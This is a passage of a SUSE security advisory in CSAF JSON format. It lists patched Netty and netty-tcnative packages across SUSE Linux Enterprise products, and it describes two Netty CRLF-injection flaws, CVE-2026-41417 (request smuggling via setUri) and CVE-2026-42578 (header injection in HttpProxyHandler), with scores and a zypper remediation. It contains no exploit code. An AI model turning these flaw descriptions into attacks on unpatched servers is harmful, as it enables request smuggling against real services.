"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP6-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP6-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.s390x as component of SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP6-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP6-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41417",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-41417"
}
],
"notes": [
{
"category": "general",
"text": "Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests, leading to HTTP request smuggling or desynchronization on the HTTP side and request injection on the RTSP side. This issue is fixed in versions 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-41417",
"url": "https://www.suse.com/security/cve/CVE-2026-41417"
},
{
"category": "external",
"summary": "SUSE Bug 1264350 for CVE-2026-41417",
"url": "https://bugzilla.suse.com/1264350"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "moderate"
}
],
"title": "CVE-2026-41417"
},
{
"cve": "CVE-2026-42578",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42578"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42578",
"url": "https://www.suse.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "SUSE Bug 1265243 for CVE-2026-42578",
"url": "https://bugzilla.suse.com/1265243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
